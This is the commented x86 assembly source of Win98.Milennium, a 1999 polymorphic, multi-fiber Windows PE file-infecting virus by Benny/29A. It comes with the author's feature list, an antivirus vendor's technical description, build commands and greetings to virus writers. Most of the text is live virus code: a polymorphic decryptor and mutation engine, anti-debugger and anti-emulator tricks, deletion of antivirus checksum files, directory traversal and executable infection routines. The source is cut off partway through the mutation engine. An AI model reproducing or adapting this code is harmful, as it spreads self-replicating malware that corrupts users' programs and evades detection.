; ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ; ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ; Win98.Milennium ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ ; by Benny/29A ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ ; ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ ; ; ; ;Author's description ;===================== ; ; ;I'm very proud to introduce first multifiber virus ever. Not only this is ;also multithreaded polymorphic compressed armoured Win98 PE file infector ;with structure similar to neural nets. For those ppl, that doesn't know, ;what fiber is i can say: "There r many differences between threads and ;fibers, but this one is the most important. Threads r scheduled by ;specific Operating System's algorihtm, so its in 50% up to OS, which ;thread will run and which not. Fibers r special threads, that r scheduled ;ONLY by YOUR algorithm." I will explain all details in my tutorial. ; ; ; ;What happens on execution ? ;---------------------------- ; ;Virus will: ;1) Decrypt it's body by polymorphic decryptor ;2) Decompress API strings ;3) Gets module handle of KERNEL32.DLL ;4) Gets addresses for all needed APIs ;5) Creates Main thread ; I) Converts actual thread to fiber ; II) Creates all needed fibers ; III) Finds file ; IV) Chex file ; V) Infects file ; VI) Loops III) - V) ; VII) Deletes TBAV checksum file ; VIII) Changes directory by dot-dot method ; IX) Loops III) - VII) ; ;6) Chex some flags (=> payload) and jumps to host program. ; ; ; ;Main features ;-------------- ; ;Platforms: Win98+, platforms supportin' threads, fibers and "IN" instruction. ;Residency: Nope, direct action only. ;Stealth: No due to nonresidency. ;Antidebuggin': Yes, uses threads, fibers and IsDebuggerPresent API. ;Antiheuristix: Yes, uses threads, fibers and polymorphic engine. ;AntiAntiVirus: Yes, deletes TBAV checksum file. ;Fast infection:Yes, infects all files in directory structure. ;Polymorphism: Yes. ;Other features:a) Usin' "Memory-Mapped files". ; b) No use of absolute addresses. ; c) The only way, how to detect this virus is check PE header ; for suspicious flags (new section and flags in last section) ; or find decryption routine (that's not easy, it's polymorphic). ; It can't be detected by heuristic analyzer due to use of ; threads and fibers. AV scanner can't trace all APIs ; and can't know all of 'em. In this age. I think, this is ; the best antiheuristic technique. ; d) Usin' SEH for handlin' expected and unexpected exeptions. ; e) Infects EXE, SCR, BAK, DAT and SFX (WinRAR) files. ; f) Two ways, how to infect file: 1) append to last section ; 2) create new section ; g) Similar structure to Neural Nets. ; h) Unicode support for future versions of windozes ; ; ; ;Payload ;-------- ; ;If virus is at least 50th generation of original, it displays ;in possibility 1:10 MessageBox. ; ; ; ;AVP's description ;================== ; ;This is not a dangerous parasitic Win98 direct action polymorphic virus. It ;uses several Windows APIs included only in Windows98 and WindowsNT 3.51 ;Service Pack 3 or higher, and will not work under Windows95. Due to ;infection-related bugs, it also doesn't work under WinNT and Win2000. So it ;is Win98 specific virus. The infection mechanism used is a very tricky one - ;- and a very stable under Win98, too. It makes this virus a very fast ;infector, but several infection related bugs unhide the virus presence in ;non-Win98 systems. When executed, the virus searches for PE executable files ;in the current directory and all the upper directories. During infection the ;virus uses two infection ways: increases the size of last file section for ;its code, or adds a new section called ".mdata". At each 30 infected file the ;virus depending on the system timer (in one case of 10) displays the ;following message box: ; ; +---------------------------------------------------+ ; | Win32.Milennium by Benny/29A | ; +---------------------------------------------------| ; | First multifiber virus is here, beware of me ;-) | ; | Click OK if u wanna run this shit..' | ; +---------------------------------------------------+ ; ; ;Technical details ;------------------ ; ;When an infected file is executed, the polymorphic routine will decrypt the ;constant virus body. Next, the virus unpacks the API names using the ;following scheme: each API name is split in words, each word that appears ;twice is stored in a dictionary (for example SetFileAttributes and ;GetFileAttributes APIs are encoded like this: ; ;Dictionary: Set, Get, File, Attributes ;Encoding: 1, 3, 4, 2, 3, 4. ; ;Any word that is not in the dictionary is stored "AS IS". After unpacking API ;names, it gets the addresses for all the used APIs. Then, it creates a thread ;and waits for it to finnish. ; ; ;The main thread and fibers ;--------------------------- ; ;The thread converts itself to a fiber and split the infection process in 7 ;pieces: ; ;Fiber 1 - gets the current directory and searches for the following file ;types: *.EXE, *.SCR, *.BAK, *.DAT, *.SFX. Then it gives control to fiber 3. ;After receiving back the control, it deletes the file (if any) ANTIVIR.DAT ;from the current directory and goes to the upper directory. ; ;Fiber 2 - checks if the code runs under a debugger and if yes, it makes the ;stack pointer zero. This will result in a debugger crash. ; ;Fiber 3 - gets a file from the current search started in Fiber 1 and calls ;Fiber 4 to continue. When Fiber4 is completed, it calls Fiber7 and waits to ;receive back the control. Then it checks for more files in the current ;directory. ; ;Fiber 4 - checks if the file size if less than 4Gb and then gives control to ;Fiber 5. After Fiber5 completes, it checks it the file is an exe file, if the ;target processor is Intel and if the file is not a DLL. Also, it pays ;attention to the Imagebase (only files with ImageBase = 400000h are infected ; - most applications are infectable from this point of view). Then it gives ;control to Fiber 6 and waits to receive it back. ; ;Fiber 5 - Opens the current file, creates a mapping object for this file to ;make infection process easier. Next, it calls Fiber6 and sleeps till it gets ;back the control. ; ;Fiber 6 - is closes the current file, restores the file time and date and, if ;needed, grows the current file to fit the virus code. ; ;Fiber 7 - it calls the main infection routine. ; ; ;File infection routine ;----------------------- ; ;When infecting a file, the virus scans its imports for one of the following ;APIs: GetModuleHandleA and GetModuleHandleW. This will be used by the virus ;to get the addresses of the APIs needed to spread. If the host file does not ;import one of the previous APIs, the virus will not infect it. Next, the ;virus adds its code - there's one chance in three to create a new section, ;called .mdata. Otherwise, it increases the size of the last section. Then it ;calls it's polymorphic engine to generate an encrypted image of the virus and ;the decryptor for it and writes generated code into the host file. ; ; ; ;Author's notes ;=============== ; ;Hmmm, fine. Adrian Marinescu made excelent work. Really. I think, he didn't ;miss any important thing nor any internal detail. Gewd werk Adrian! ;Nevertheless, there is one thing, I have to note. Adrian made description of ;beta of Milennium. U can see, that payload writes Win32.Milennium instead ;Win98. That time I didn't tested it on WinNTs and I expected, it will be ;Win32 compatible. Unfortunately, I forgot, that IN is privileged opcode under ;WinNT (that's that bug, Adrian talked about). And after some other ;corrections (beta deleted ANTIVIR.DAT files instead ANTI-VIR.DAT), I started ;to call this virus Win98+ compatible. However, Adrians informators (or ;himself) probably never saw sharp version of Milennium. Hmm, maybe l8r. But ;this doesn't change anything on thing, that Adrian deeply analysed this virus ;and that he made really excelent work. I think its all. ; ; ; ;Greetz ;======= ; ; All 29Aers..... Thank ya for all! I promise, I'll do everything ; I can ever do for 29A. ; LethalMnd...... U have a potential, keep workin' on yourself! ; Yesnah......... Find another dolly, babe :-)). ; Adrian/GeCAD... Fuck off AV, join 29A! X-D ; ; ; ;How to build ;============= ; ; tasm32 -ml -q -m4 mil.asm ; tlink32 -Tpe -c -x -aa -r mil.obj,,, import32 ; pewrsec.com mil.exe ; ; ; ;For who is this dedicated ? ;============================ ; ;This virus is dedicated for somebody. Hehe, surprisely. It's dedicated to all ;good VXerz (N0T lamerz !!!) with greet, next Milennium will be our. ;Don't give up !!! ; ; ; ;(c) 1999 Benny/29A. .386p ;386+ intructions .model flat ;flat model include MZ.inc ;include some needed files include PE.inc include Win32API.inc include Useful.inc extrn ExitProcess:PROC ;some APIs needed by first generation extrn GetModuleHandleA:PROC extrn GetModuleHandleW:PROC .data db ? ;for TLINK32 compatibility ends ;VIRUS CODE STARTS HERE... .code Start: pushad ;push all regs @SEH_SetupFrame ;setup SEH frame inc byte ptr [edx] ;===> GP fault jmp Start ;some stuff for dumb emulators seh_fn: @SEH_RemoveFrame ;remove SEH frame popad ;and pop all regs ;stuff above will fuck AV-emulators push eax ;leave some space for "ret" to host pushad ;push all regs ;POLY DECRYPTOR STARTS HERE... @j1: db 3 dup (90h) call @j2 @j2: db 3 dup (90h) @1: pop ebp @j3: db 3 dup (90h) @2: sub ebp, offset @j2 @j4: db 3 dup (90h) ; mov ecx, (virus_end-encrypted+3)/4 @4: db 10111001b dd (virus_end-encrypted+3)/4 @j5: db 3 dup (90h) ; lea esi, [ebp + encrypted] db 10001101b @3: db 10110101b ; regmod dd offset encrypted @j6: db 3 dup (90h) decrypt: ; xor dword ptr [esi], 0 db 10000001b @7: db 00110110b key: dd 0 @j7: db 3 dup (90h) _next_: ; add esi, 4 db 10000011b @8: db 11000110b db 4 @j8: db 3 dup (90h) ; dec ecx @5: db 01001001b @j9: db 3 dup (90h) ; test ecx, ecx db 10000101b @6: db 11001001b jne decrypt encrypted: nFile = 1 ;some constants for decompress stage nGet = 2 nSet = 3 nModule = 4 nHandle = 5 nCreate = 6 nFind = 7 nClose = 8 nViewOf = 9 nCurrentDirectoryA= 10 nFiber = 11 nThread = 12 nDelete = 13 nLibrary = 14 numof_csz = 15 ;number of 'em call skip_strings cstringz: ;module names cszKernel32 db 'KERNEL32', 0 cszKernel32W dw 'K','E','R','N','E','L','3','2', 0 cszUser32 db 'USER32', 0 ;compressed API names cszGetModuleHandleA db nGet, nModule, nHandle, 'A', 0 cszGetModuleHandleW db nGet, nModule, nHandle, 'W', 0 cszCreateThread db nCreate, nThread, 0 cszWaitForSingleObject db 'WaitForSingleObject', 0 cszCloseHandle db nClose, nHandle, 0 cszConvertThreadToFiber db 'Convert', nThread, 'To', nFiber, 0 cszCreateFiber db nCreate, nFiber, 0 cszSwitchToFiber db 'SwitchTo', nFiber, 0 cszDeleteFiber db nDelete, nFiber, 0 cszGetVersion db nGet, 'Version', 0 cszFindFirstFileA db nFind, 'First', nFile, 'A', 0 cszFindNextFileA db nFind, 'Next', nFile, 'A', 0 cszFindClose db nFind, nClose, 0 cszCreateFileA db nCreate, nFile, 'A', 0 cszCreateFileMappingA db nCreate, nFile, 'MappingA', 0 cszMapViewOfFile db 'Map', nViewOf, nFile, 0 cszUnmapViewOfFile db 'Unmap', nViewOf, nFile, 0 cszSetFileAttributesA db nSet, nFile, 'AttributesA', 0 cszSetFilePointer db nSet, nFile, 'Pointer', 0 cszSetEndOfFile db nSet, 'EndOf', nFile, 0 cszSetFileTime db nSet, nFile, 'Time', 0 cszGetCurrentDirectoryA db nGet, nCurrentDirectoryA, 0 cszSetCurrentDirectoryA db nSet, nCurrentDirectoryA, 0 cszDeleteFile db nDelete, nFile, 'A', 0 cszLoadLibraryA db 'Load', nLibrary, 'A', 0 cszFreeLibraryA db 'Free', nLibrary, 0 cszIsDebuggerPresent db 'IsDebuggerPresent', 0 db 0ffh szMessageBoxA db 'MessageBoxA', 0 ;strings for payload szTitle db 'Win98.Milennium by Benny/29A', 0 szText db 'First multifiber virus is here, beware of me ! ;-)', 0dh db 'Click OK if u wanna run this shit...', 0 skip_strings: pop esi ;get relative delta offset mov ebp, esi sub ebp, offset cstringz lea edi, [ebp + strings] next_ch:lodsb ;decompressing stage test al, al je copy_b cmp al, 0ffh je end_unpacking cmp al, numof_csz jb packed copy_b: stosb jmp next_ch packed: push esi lea esi, [ebp + string_subs] mov cl, 1 mov dl, al lodsb packed2:test al, al je _inc_ packed3:cmp cl, dl jne un_pck p_cpy: stosb lodsb test al, al jne p_cpy pop esi jmp next_ch un_pck: lodsb test al, al jne packed3 _inc_: inc ecx jmp un_pck end_unpacking: stosb ;store 0ffh byte mov ecx, offset _GetModuleHandleA - 400000h ;some params GMHA = dword ptr $ - 4 mov ebx, offset _GetModuleHandleW - 400000h GMHW = dword ptr $ - 4 lea edx, [ebp + szKernel32] lea esi, [ebp + szKernel32W] call MyGetModuleHandle ;pseudo-neuron jecxz error xchg ebx, ecx lea esi, [ebp + szAPIs] ;params for next lea edi, [ebp + ddAPIs] call MyGetProcAddress ;pseudo-neuron jecxz error xor eax, eax lea edx, [ebp + dwThreadID] push edx push eax push ebp lea edx, [ebp + MainThread] push edx push eax push eax call [ebp + ddCreateThread] ;create main thread mov ebx, eax ;wait for xor eax, eax ;thread dec eax ;signalization push eax push ebx call [ebp + ddWaitForSingleObject] ;... push ebx ;and close handle call [ebp + ddCloseHandle] ;of main thread call payload ;try payload error: mov eax, [ebp + Entrypoint] add eax, 400000h mov [esp.cPushad], eax popad ret ;and jump to host ;------------------------------------------------------------------------------- payload: cmp byte ptr [ebp + GenerationCount], 30 ;30th generation ? jne end_payload ;nope in al, 40h and al, 9d jne end_payload ;chance 1:10 lea edx, [ebp + szUser32] ;yup, load library push edx ;(USER32.DLL) call [ebp + ddLoadLibraryA] xchg eax, ecx jecxz end_payload xchg ecx, ebx lea esi, [ebp + szMessageBoxA] ;get address of call GetProcAddress ;MessageBoxA API xchg eax, ecx ;error ? jecxz end_payload ;... push 1000h ;pass params lea edx, [ebp + szTitle] push edx lea edx, [ebp + szText] push edx push 0 call ecx ;call API push ebx call [ebp + ddFreeLibraryA] ;and unload library end_payload: ret ;------------------------------------------------------------------------------- MyGetModuleHandle Proc ;our GetModuleHandle function jecxz try_GMHW ;try Unicode version mov edi, 400000h push edx _GMH_: add ecx, edi call [ecx] xchg eax, ecx er_GMH: ret try_GMHW: ;Unicode version mov ecx, ebx jecxz er_GMH push esi jmp _GMH_ MyGetModuleHandle EndP ;------------------------------------------------------------------------------- MyGetProcAddress Proc ;our GetProcAddress function call GetProcAddress test eax, eax ;error ? je er_GPA stosd ;store address @endsz ;get next API name cmp byte ptr [esi], 0ffh ;end of API names ? jne MyGetProcAddress ;no, next API ret ;yeah, quit er_GPA: xor ecx, ecx ret GetProcAddress: pushad @SEH_SetupFrame mov eax, ebx add eax, [eax.MZ_lfanew] mov ecx, [eax.NT_OptionalHeader.OH_DirectoryEntries.DE_Export.DD_Size] jecxz Proc_Address_not_found mov ebp, ebx add ebp, [eax.NT_OptionalHeader.OH_DirectoryEntries.DE_Export.DD_VirtualAddress] push ecx mov edx, ebx add edx, [ebp.ED_AddressOfNames] mov ecx, [ebp.ED_NumberOfNames] xor eax, eax Search_for_API_name: mov edi, [esp + 16] mov esi, ebx add esi, [edx + eax * 4] Next_Char_in_API_name: cmpsb jz Matched_char_in_API_name inc eax loop Search_for_API_name pop eax Proc_Address_not_found: xor eax, eax jmp end_GetProcAddress Matched_char_in_API_name: cmp byte ptr [esi-1], 0 jne Next_Char_in_API_name pop ecx mov edx, ebx add edx, [ebp.ED_AddressOfOrdinals] movzx eax, word ptr [edx + eax * 2] Check_Index: cmp eax, [ebp.ED_NumberOfFunctions] jae Proc_Address_not_found mov edx, ebx add edx, [ebp.ED_AddressOfFunctions] add ebx, [edx + eax * 4] mov eax, ebx sub ebx, ebp cmp ebx, ecx jb Proc_Address_not_found end_GetProcAddress: @SEH_RemoveFrame mov [esp.Pushad_eax], eax popad ret MyGetProcAddress EndP ;------------------------------------------------------------------------------- GetProcAddressIT proc ;inputs: EAX - API name ; ECX - lptr to MZ header ; EDX - module name ;outputs: EAX - RVA pointer to IAT, 0 if error pushad xor eax, eax push ebp mov esi, [ecx.MZ_lfanew] add esi, ecx mov eax, [esi.NT_OptionalHeader.OH_DirectoryEntries.DE_Import.DD_VirtualAddress] mov ebp, ecx push ecx movzx ecx, word ptr [esi.NT_FileHeader.FH_NumberOfSections] movzx ebx, word ptr [esi.NT_FileHeader.FH_SizeOfOptionalHeader] lea ebx, [esi.NT_OptionalHeader + ebx] scan_sections: mov edx, [ebx.SH_VirtualAddress] cmp edx, eax je section_found sub ebx, -IMAGE_SIZEOF_SECTION_HEADER loop scan_sections pop ecx pop eax jmp End_GetProcAddressIT2 section_found: mov ebx, [ebx + 20] add ebx, ebp pop ecx pop eax test ebx, ebx je End_GetProcAddressIT2 xor esi, esi xor ebp, ebp push esi dec ebp Get_DLL_Name: pop esi inc ebp mov edi, [esp + 20] mov ecx, [ebx.esi.ID_Name] test ecx, ecx je End_GetProcAddressIT2 sub ecx, edx sub esi, -IMAGE_SIZEOF_IMPORT_DESCRIPTOR push esi lea esi, [ebx + ecx] Next_Char_from_DLL: lodsb add al, -'.' jz IT_nup sub al, -'.' + 'a' cmp al, 'z' - 'a' + 1 jae no_up add al, -20h no_up: sub al, -'a' IT_nup: scasb jne Get_DLL_Name cmp byte ptr [edi-1], 0 jne Next_Char_from_DLL Found_DLL_Name: pop esi imul eax, ebp, IMAGE_SIZEOF_IMPORT_DESCRIPTOR mov ecx, [ebx + eax.ID_OriginalFirstThunk] jecxz End_GetProcAddressIT2 sub ecx, edx add ecx, ebx xor esi, esi Next_Imported_Name: push esi mov edi, [esp + 32] mov esi, [ecx + esi] test esi, esi je End_GetProcAddressIT3 sub esi, edx add esi, ebx lodsw next_char: cmpsb jne next_step cmp byte ptr [esi-1], 0 je got_it jmp next_char next_step: pop esi sub esi, -4 jmp Next_Imported_Name got_it: pop esi imul ebp, IMAGE_SIZEOF_IMPORT_DESCRIPTOR add ebx, ebp mov eax, [ebx.ID_FirstThunk] add eax, esi mov [esp + 28], eax jmp End_GetProcAddressIT End_GetProcAddressIT3: pop eax End_GetProcAddressIT2: n6: xor eax, eax mov [esp.Pushad_eax], eax End_GetProcAddressIT: popad ret GetProcAddressIT EndP ;------------------------------------------------------------------------------- ; NOTE: Dendrit = Input, Axon = output, Synapse = jump link ;------------------------------------------------------------------------------- MainThread Proc PASCAL delta_param:DWORD ;delta offset as dendrit pushad ;store all regs mov ebx, delta_param ;store delta offset push 0 call [ebx + ddConvertThreadToFiber] ;convert thread to fiber xchg eax, ecx jecxz exit_main ;error ? mov [ebx + pfMain], ecx ;store context lea esi, [ebx + Neuron_Addresses] ;create all needed fibers lea edi, [ebx + Fiber_Addresses+4] mov ecx, num_of_neurons init_neurons: lodsd push ecx push ebx add eax, ebx push eax push 0 call [ebx + ddCreateFiber] ;create fiber pop ecx test eax, eax je exit_main stosd loop init_neurons push [ebx + pfNeuron_Main] call [ebx + ddSwitchToFiber] ;switch to main neuron exit_main: popad ret MainThread EndP ;------------------------------------------------------------------------------- Neuron_Main Proc PASCAL delta_param:DWORD ;delta offset as dendrit pushad ;store all regs mov ebx, delta_param ;store delta offset push [ebx + pfNeuron_Debugger] call [ebx + ddSwitchToFiber] ;dwitch to neuron lea edx, [ebx + CurDir] push edx push MAX_PATH call [ebx + ddGetCurrentDirectoryA] ;store current directory mov ecx, 20 path_walk: push ecx lea esi, [ebx + szExe] ;extension mov ecx, num_of_exts process_dir: push ecx mov [ebx + nfindfile_name], esi ;dendrit mov [ebx + nFF_synapse], offset pfNeuron_Main ;build synapse push [ebx + pfNeuron_FindFile] call [ebx + ddSwitchToFiber] ;infect directory @endsz pop ecx loop process_dir ;next extension lea esi, [ebx + dtavTBAV] push 0 push esi call [ebx + ddSetFileAttributesA] ;blank file attributes push esi call [ebx + ddDeleteFileA] ;delete TBAV checksum file lea edx, [ebx + dotdot] push edx call [ebx + ddSetCurrentDirectoryA] ;switch to subdirectory pop ecx loop path_walk lea edx, [ebx + CurDir] push edx call [ebx + ddSetCurrentDirectoryA] ;switch back push [ebx + pfMain] call [ebx + ddSwitchToFiber] ;switch back to main fiber popad ret Neuron_Main EndP ;------------------------------------------------------------------------------- Neuron_Debugger Proc PASCAL delta_param:DWORD ;delta offset as dendrit pushad ;store all regs mov ebx, delta_param ;store delta offset call [ebx + ddIsDebuggerPresent] ;is debugger present ? xchg eax, ecx jecxz end_debugger ;nope, jump to end in al, 40h ;this will cause execution xor esp, esp ;"xor esp, esp" under TD32 end_debugger: push [ebx + pfNeuron_Main] call [ebx + ddSwitchToFiber] ;jump back to main neuron popad ret Neuron_Debugger EndP ;------------------------------------------------------------------------------- Neuron_FindFile Proc PASCAL delta_param:DWORD ;delta offset as dendrit n_findfile: pushad ;save all regs mov ebx, delta_param ;store delta offset mov edx, 0 ;pointer to file name nfindfile_name = dword ptr $ - 4 ;as dendrit lea eax, [ebx + WFD] ;find first file push eax push edx call [ebx + ddFindFirstFileA] xchg eax, ecx jecxz end_FindFile mov [ebx + SearchHandle], ecx ;save search handle checkfile: mov [ebx + nCF_synapse], offset pfNeuron_FindFile ;build synapse push [ebx + pfNeuron_CheckFile] call [ebx + ddSwitchToFiber] ;and switch to neuron xor eax, eax cmp al, 0 nCheckFile_OK = byte ptr $ - 1 ;check Axon je find_next_file ;check failed ? mov [ebx + nIF_synapse], offset pfNeuron_FindFile ;build synapse push [ebx + pfNeuron_InfectFile] call [ebx + ddSwitchToFiber] ;and switch to neuron find_next_file: lea edx, [ebx + WFD] push edx push [ebx + SearchHandle] call [ebx + ddFindNextFileA] ;find next file test eax, eax jne checkfile ;r there more files ? push [ebx + SearchHandle] call [ebx + ddFindClose] ;nope, close search handle end_FindFile: push [ebx + dwThreadID] nFF_synapse = dword ptr $ - 4 ;jump to previous neuron call [ebx + ddSwitchToFiber] ;(depends on synapse) popad jmp n_findfile Neuron_FindFile EndP ;------------------------------------------------------------------------------- Neuron_CheckFile Proc PASCAL delta_param:DWORD ;d-offset as dendrit n_checkfile: pushad ;store all regs mov ebx, delta_param ;store delta offset mov [ebx + nCheckFile_OK], 0 test [ebx + WFD.WFD_dwFileAttributes], FILE_ATTRIBUTE_DIRECTORY jne end_checkfile ;discard directories xor edx, edx mov ecx, [ebx + WFD.WFD_nFileSizeHigh] cmp ecx, edx jne end_checkfile ;discard huge files add dx, 4096 cmp [ebx + WFD.WFD_nFileSizeLow], edx jb end_checkfile ;discard small files mov [ebx + nopenfile_size], ecx ;dendrit mov [ebx + nOF_synapse], offset pfNeuron_CheckFile ;build synapse push [ebx + pfNeuron_OpenFile] call [ebx + ddSwitchToFiber] ;switch to neuron mov ecx, [ebx + lpFile] jecxz end_checkfile ;mapped failed ? mov dl, byte ptr [ecx.MZ_res2] test dl, dl jne end_check_close ;test "already infected" mark mov edx, ecx cmp word ptr [ecx], IMAGE_DOS_SIGNATURE ;must be MZ jne end_check_close mov ecx, [ecx.MZ_lfanew] jecxz end_check_close mov eax, [ebx + WFD.WFD_nFileSizeLow] cmp eax, ecx jb end_check_close ;must point inside file add ecx, edx cmp dword ptr [ecx], IMAGE_NT_SIGNATURE ;must be PE\0\0 jne end_check_close cmp word ptr [ecx.NT_FileHeader.FH_Machine], IMAGE_FILE_MACHINE_I386 jne end_check_close ;must be 386+ test byte ptr [ecx.NT_FileHeader.FH_Characteristics], IMAGE_FILE_EXECUTABLE_IMAGE je end_check_close cmp [ecx.NT_OptionalHeader.OH_ImageBase], 400000h ;must be 0x400000 jne end_check_close xor eax, eax inc eax mov [ebx + nCheckFile_OK], al ;axon end_check_close: cdq inc edx inc edx mov [ebx + nclosefile_mode], dl ;dendrit mov [ebx + nClF_synapse], offset pfNeuron_CheckFile push [ebx + pfNeuron_CloseFile] call [ebx + ddSwitchToFiber] ;switch to neuron end_checkfile: push [ebx + dwThreadID] nCF_synapse = dword ptr $ - 4 call [ebx + ddSwitchToFiber] ;jump to previous neuron popad jmp n_checkfile Neuron_CheckFile EndP ;------------------------------------------------------------------------------- Neuron_OpenFile Proc PASCAL delta_param:DWORD ;delta offset as dendrit n_openfile: pushad ;store all regs mov ebx, delta_param ;store delta offset lea esi, [ebx + WFD.WFD_szFileName] mov edi, 0 nopenfile_size = dword ptr $ - 4 ;dendrit xor eax, eax mov [ebx + lpFile], eax push eax push eax push OPEN_EXISTING push eax mov al, 1 push eax ror eax, 1 mov ecx, edi jecxz $ + 4 rcr eax, 1 push eax push esi call [ebx + ddCreateFileA] ;open file inc eax je end_OpenFile dec eax mov [ebx + hFile], eax cdq push edx push edi push edx mov dl, PAGE_READONLY test edi, edi je $ + 4 shl dl, 1 push edx push 0 push eax call [ebx + ddCreateFileMappingA] ;create mappin object test eax, eax je end_OpenFile2 mov [ebx + hMapFile], eax cdq push edi push edx push edx mov dl, FILE_MAP_READ test edi, edi je $ + 4 shr dl, 1 push edx push eax call [ebx + ddMapViewOfFile] ;map view of file mov [ebx + lpFile], eax test eax, eax jne end_OpenFile end_OpenFile3: inc eax end_OpenFile2: mov [ebx + nclosefile_mode], al ;axon mov eax, [nOF_synapse] mov [ebx + nClF_synapse], eax ;dendrit push [ebx + pfNeuron_CloseFile] call [ebx + ddSwitchToFiber] ;switch to neuron end_OpenFile: push [ebx + dwThreadID] nOF_synapse = dword ptr $ - 4 call [ebx + ddSwitchToFiber] ;switch to previous neuron popad jmp n_openfile Neuron_OpenFile EndP ;------------------------------------------------------------------------------- Neuron_CloseFile Proc PASCAL delta_param:DWORD ;delta offset as dendrit n_closefile: pushad ;store all regs mov ebx, delta_param ;store delta offset mov esi, [ebx + hFile] xor edi, edi xor ecx, ecx mov cl, 0 nclosefile_mode = byte ptr $ - 1 ;dendrit jecxz closefile cmp cl, 1 je closemap cmp cl, 2 je unmapfile cmp al, 3 je next_edi inc edi next_edi: inc edi unmapfile: push [ebx + lpFile] call [ebx + ddUnmapViewOfFile] ;unmap view of file closemap: push [ebx + hMapFile] call [ebx + ddCloseHandle] ;close mappin object test edi, edi je closefile cmp edi, 1 je set_time xor eax, eax push eax push eax push [ebx + WFD.WFD_nFileSizeLow] push esi call [ebx + ddSetFilePointer] ;set file pointer API push esi call [ebx + ddSetEndOfFile] ;set EOF set_time: lea eax, [ebx + WFD.WFD_ftLastWriteTime] push eax lea eax, [ebx + WFD.WFD_ftLastAccessTime] push eax lea eax, [ebx + WFD.WFD_ftCreationTime] push eax push esi call [ebx + ddSetFileTime] ;set back file time closefile: push [ebx + hFile] call [ebx + ddCloseHandle] ;close file push [ebx + dwThreadID] nClF_synapse = dword ptr $ - 4 call [ebx + ddSwitchToFiber] ;jump to previous neuron popad jmp n_closefile Neuron_CloseFile EndP ;------------------------------------------------------------------------------- Neuron_InfectFile Proc PASCAL delta_param:DWORD ;delta offset as dendrit n_infectfile: pushad ;store all regs mov ebx, delta_param ;store delta offset @SEH_SetupFrame ;setup SEH frame xor esi, esi push esi lea edi, [ebx + WFD.WFD_szFileName] push edi call [ebx + ddSetFileAttributesA] ;blank file attributes test eax, eax je end_InfectFile mov eax, [ebx + WFD.WFD_nFileSizeLow] sub eax, Start - virus_end mov [ebx + nopenfile_size], eax ;dendrit mov [ebx + nOF_synapse], offset pfNeuron_InfectFile ;synapse push [ebx + pfNeuron_OpenFile] call [ebx + ddSwitchToFiber] ;switch to neuron mov ecx, [ebx + lpFile] test ecx, ecx je err_InfectFile lea eax, [ebx + szGetModuleHandleA] lea edx, [ebx + szKernel32] call GetProcAddressIT ;imports GetModuleHandleA ? test eax, eax jne store lea eax, [ebx + szGetModuleHandleW] ;nope, must import Unicode call GetProcAddressIT ;version of that test eax, eax je err_InfectFile mov [ebx + GMHW], eax xor eax, eax store: mov [ebx + GMHA], eax push ecx add ecx, [ecx.MZ_lfanew] mov edx, ecx x = IMAGE_SIZEOF_SECTION_HEADER movzx esi, word ptr [edx.NT_FileHeader.FH_SizeOfOptionalHeader] lea esi, [edx.NT_OptionalHeader + esi] movzx eax, word ptr [edx.NT_FileHeader.FH_NumberOfSections] test eax, eax je err_InfectFile imul eax, x add esi, eax in al, 40h ;select how to infect file and al, 2 je NextWayOfInfection push [esi.SH_SizeOfRawData - x] lea edi, [esi.SH_VirtualSize - x] sub dword ptr [edi], Start - virtual_end ;new virtual size mov eax, [edi] push edx mov ecx, [edx.NT_OptionalHeader.OH_FileAlignment] cdq div ecx inc eax mul ecx mov [esi.SH_SizeOfRawData - x], eax ;new SizeOfRawData mov ecx, eax pop edx mov eax, [ebx + Entrypoint] push [edx.NT_OptionalHeader.OH_AddressOfEntryPoint] pop [ebx + Entrypoint] pop edi push eax sub ecx, edi add [edx.NT_OptionalHeader.OH_SizeOfImage], ecx ;new SizeOfImage or [esi.SH_Characteristics.hiw.hib - x], 0e0h ;change flags mov eax, [esi.SH_PointerToRawData - x] add eax, edi mov ecx, [ebx + WFD.WFD_nFileSizeLow] add edi, ecx sub edi, eax mov esi, [esi.SH_VirtualAddress - x] add esi, edi mov [edx.NT_OptionalHeader.OH_AddressOfEntryPoint], esi ;new EP pop eax copy_virus: pop edi mov byte ptr [edi.MZ_res2], 1 ;set "already infected" mark add edi, ecx pushad ;POLY ENGINE STARTS HERE... rep_1: call get_reg ;load random register mov dl, al add al, 58h ;create POP reg mov byte ptr [ebx + @1], al ;store it lea edi, [ebx + @2+1] ;and aply registry changes call mask_it ;to all needed lea edi, [ebx + @3] ;instructions call mask_it ;... rep_2: call get_reg ;get random register cmp al, dl ;mustnt be previous register je rep_2 mov dh, al xchg dl, dh add al, 0b8h ;create MOV instruction mov byte ptr [ebx + @4], al ;store it lea edi, [ebx + @5] ;and aply changes call mask_it push eax in al, 40h and al, 1 je _test_ mov al, 0bh ;OR reg, reg jmp _write _test_: mov al, 85h ;TEST reg, reg _write: mov byte ptr [ebx + @6-1], al ;store it pop eax lea edi, [ebx + @6] mov al, [edi] and al, 11000000b add al, dl ror al, 3 add al, dl rol al, 3 stosb rep_3: call get_reg ;get random register cmp al, dl ;mustnt be previous register je rep_3 cmp al, dh je rep_3 cmp al, 101b ;mustnt be EBP je rep_3 ;(due to instr. incompatibility) mov dl, al lea edi, [ebx + @3] mov al, [edi] and al, 11000111b ror al, 3 add al, dl rol al, 3 stosb lea edi, [ebx + @7] call mask_it lea edi, [ebx + @8] call mask_it lea esi, [ebx + junx] gen_j: lodsd ;junk instructions generator xchg eax, ecx jecxz end_mutate mov edi, ecx add edi, ebx xor eax, eax in al, 40h and al, 1 je _2&1_ push esi lea esi, [ebx + junx3] in al, 40h and al, num_junx3-1 add esi, eax movsb movsb in al, 40h stosb jmp _gen_j _2&1_: push esi in al, 40h and al, 1 je twofirst call one_byte call two_byte jmp _gen_j twofirst: call two_byte call one_byte _gen_j: pop esi jmp gen_j end_mutate: popad push eax in al, 40h ;create 32bit key mov ah, al in al, 40h shl eax, 16 in al, 40h mov ah, al in al, 40h mov dword ptr [ebx + key], eax ;store it push edi mov edx, (virus_end-Start+3)/4 ;copy virus body to internal lea esi, [ebx + Start] ;buffer mov ecx, edx lea edi, [ebx + buffer] rep movsd xor ecx, ecx lea esi, [ebx + buffer - Start + 